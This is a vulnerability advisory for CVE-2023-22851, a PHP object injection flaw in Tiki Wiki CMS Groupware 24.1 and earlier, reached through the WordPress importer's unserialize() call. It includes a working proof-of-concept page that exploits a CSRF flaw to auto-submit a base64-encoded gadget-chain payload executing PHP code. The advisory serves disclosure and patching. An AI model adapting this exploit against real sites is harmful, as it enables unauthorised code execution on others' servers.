Home[1] Files[2] News[3] &[SERVICES_TAB] Contact[4] Add New[5]
- Tiki Wiki CMS Groupware 24.1 tikiimporter_blog_wordpress.php PHP Object Injection[6]
- Authored by EgiX[7] | Site karmainsecurity.com[8]
-
Tiki Wiki CMS Groupware versions 24.1 and below suffer from a PHP object injection vulnerability in tikiimporter_blog_wordpress.php.
- advisories | CVE-2023-22851[9]
- SHA-256 |
1b6698ff49dd75e5444eb0fdffd03d9806fd9c813b8e9255172cc30fc8eee07c
- Download[10] | Favorite[11] | View[12]
Change Mirror[13] Download[14]
----------------------------------------------------------------------------------------------------
Tiki Wiki CMS Groupware <= 24.1 (tikiimporter_blog_wordpress.php) PHP
Object Injection Vulnerability
----------------------------------------------------------------------------------------------------
[-] Software Link:
https://tiki.org
[-] Affected Versions:
Version 24.1 and prior versions.
[-] Vulnerability Description:
The vulnerability is located in the
/lib/importer/tikiimporter_blog_wordpress.php script. Specifically, when
importing data from WordPress sites through the Tiki Importer, user
input passed through the uploaded XML file is being used in a call to
the unserialize() PHP function. This can be exploited by malicious users
to inject arbitrary PHP objects into the application scope, allowing
them to perform a variety of attacks, such as executing arbitrary PHP
code. Successful exploitation of this vulnerability requires an admin
account (specifically, the ‘tiki_p_admin_importer’ permission). However,
due to the CSRF vulnerability described in KIS-2023-01, this
vulnerability might also be exploited by tricking a victim user into
opening a web page like the following:
<html>
<form action="http://localhost/tiki/tiki-importer.php" method="POST"
enctype="multipart/form-data">
<input type="hidden" name="importerClassName"
value="TikiImporter_Blog_Wordpress" />
<input type="hidden" name="importAttachments" value="on" />
<input type="file" name="importFile" id="fileinput"/>
</form>
<script>
const xmlContent =
atob("PD94bWwgdmVyc2lvbj0iMS4wIiA/Pgo8cnNzIHZlcnNpb249IjIuMCIgeG1sbnM6d3A9Imh0dHA6Ly93b3JkcHJlc3Mub3JnL2V4cG9ydC8xLjIvIj4KIDxjaGFubmVsPgogIDxpdGVtPgogICA8d3A6cG9zdF90eXBlPmF0dGFjaG1lbnQ8L3dwOnBvc3RfdHlwZT4KICAgPHdwOnBvc3RtZXRhPgogICAgPHdwOm1ldGFfa2V5Pl93cF9hdHRhY2htZW50X21ldGFkYXRhPC93cDptZXRhX2tleT4KICAgIDx3cDptZXRhX3ZhbHVlPjwhW0NEQVRBW086MjU6IlNlYXJjaF9FbGFzdGljX0Nvbm5lY3Rpb24iOjE6e1M6MzE6IlwwMFNlYXJjaF9FbGFzdGljX0Nvbm5lY3Rpb25cMDBidWxrIjtPOjI4OiJTZWFyY2hfRWxhc3RpY19CdWxrT3BlcmF0aW9uIjozOntTOjM1OiJcMDBTZWFyY2hfRWxhc3RpY19CdWxrT3BlcmF0aW9uXDAwY291bnQiO2k6MTtTOjM4OiJcMDBTZWFyY2hfRWxhc3RpY19CdWxrT3BlcmF0aW9uXDAwY2FsbGJhY2siO1M6MTQ6ImNhbGxfdXNlcl9mdW5jIjtTOjM2OiJcMDBTZWFyY2hfRWxhc3RpY19CdWxrT3BlcmF0aW9uXDAwYnVmZmVyIjthOjI6e2k6MDtPOjIyOiJUcmFja2VyX0ZpZWxkX0NvbXB1dGVkIjozOntTOjMyOiJcMDBUcmFja2VyX0ZpZWxkX0Fic3RyYWN0XDAwaXRlbURhdGEiO2E6MTp7Uzo2OiJpdGVtSWQiO2k6MTt9UzozMToiXDAwVHJhY2tlcl9GaWVsZF9BYnN0cmFjdFwwMG9wdGlvbnMiO086MTU6IlRyYWNrZXJfT3B0aW9ucyI6MTp7UzoyMToiXDAwVHJhY2tlcl9PcHRpb25zXDAw
ZGF0YSI7YToxOntTOjc6ImZvcm11bGEiO1M6MTQ6Im51bGw7cGhwaW5mbygpIjt9fVM6NDE6IlwwMFRyYWNrZXJfRmllbGRfQWJzdHJhY3RcMDB0cmFja2VyRGVmaW5pdGlvbiI7TzoxODoiVHJhY2tlcl9EZWZpbml0aW9uIjowOnt9fWk6MTtTOjEyOiJnZXRGaWVsZERhdGEiO319fV1dPjwvd3A6bWV0YV92YWx1ZT4KICAgPC93cDpwb3N0bWV0YT4KICA8L2l0ZW0+CiA8L2NoYW5uZWw+CjwvcnNzPg==");
const fileInput = document.getElementById("fileinput");
const dataTransfer = new DataTransfer();
const file = new File([xmlContent], "test.xml", {type: "text/xml"});
dataTransfer.items.add(file);
fileInput.files = dataTransfer.files;
document.forms[0].submit();
</script>
</html>
[-] Solution:
Upgrade to version 24.2 or later.
[-] Disclosure Timeline:
[07/03/2022] - Vendor notified
[23/08/2022] - Version 24.1 released
[09/01/2023] - Public disclosure
[-] CVE Reference:
The Common Vulnerabilities and Exposures project (cve.mitre.org)
has assigned the name CVE-2023-22851 to this vulnerability.
[-] Credits:
Vulnerability discovered by Egidio Romano.
[-] Original Advisory:
http://karmainsecurity.com/KIS-2023-04
File Tags
- ActiveX[19] (932)
- Advisory[20] (79,818)
- Arbitrary[21] (15,721)
- BBS[22] (2,859)
- Bypass[23] (1,625)
- CGI[24] (1,018)
- Code Execution[25] (6,949)
- Conference[26] (674)
- Cracker[27] (840)
- CSRF[28] (3,291)
- DoS[29] (22,628)
- Encryption[30] (2,353)
- Exploit[31] (50,416)
- File Inclusion[32] (4,166)
- File Upload[33] (946)
- Firewall[34] (821)
- Info Disclosure[35] (2,664)
- Intrusion Detection[36] (868)
- Java[37] (2,903)
- JavaScript[38] (823)
- Kernel[39] (6,307)
- Local[40] (14,210)
- Magazine[41] (586)
- Overflow[42] (12,432)
- Perl[43] (1,418)
- PHP[44] (5,097)
- Proof of Concept[45] (2,293)
- Protocol[46] (3,438)
- Python[47] (1,468)
- Remote[48] (30,080)
- Root[49] (3,506)
- Rootkit[50] (501)
- Ruby[51] (595)
- Scanner[52] (1,633)
- Security Tool[53] (7,792)
- Shell[54] (3,108)
- Shellcode[55] (1,206)
- Sniffer[56] (887)
- Spoof[57] (2,172)
- SQL Injection[58] (16,115)
- TCP[59] (2,382)
- Trojan[60] (686)
- UDP[61] (878)
- Virus[62] (662)
- Vulnerability[63] (31,169)
- Web[64] (9,378)
- Whitepaper[65] (3,732)
- x86[66] (946)
- XSS[67] (17,500)
- Other[68]
File Archives
- January 2023[69]
- December 2022[70]
- November 2022[71]
- October 2022[72]
- September 2022[73]
- August 2022[74]
- July 2022[75]
- June 2022[76]
- May 2022[77]
- April 2022[78]
- March 2022[79]
- February 2022[80]
- Older[81]
Systems
- AIX[82] (426)
- Apple[83] (1,935)
- BSD[84] (370)
- CentOS[85] (55)
- Cisco[86] (1,917)
- Debian[87] (6,644)
- Fedora[88] (1,690)
- FreeBSD[89] (1,242)
- Gentoo[90] (4,279)
- HPUX[91] (878)
- iOS[92] (333)
- iPhone[93] (108)
- IRIX[94] (220)
- Juniper[95] (67)
- Linux[96] (44,375)
- Mac OS X[97] (684)
- Mandriva[98] (3,105)
- NetBSD[99] (255)
- OpenBSD[100] (479)
- RedHat[101] (12,485)
- Slackware[102] (941)
- Solaris[103] (1,607)
- SUSE[104] (1,444)
- Ubuntu[105] (8,220)
- UNIX[106] (9,173)
- UnixWare[107] (185)
- Windows[108] (6,511)
- Other[109]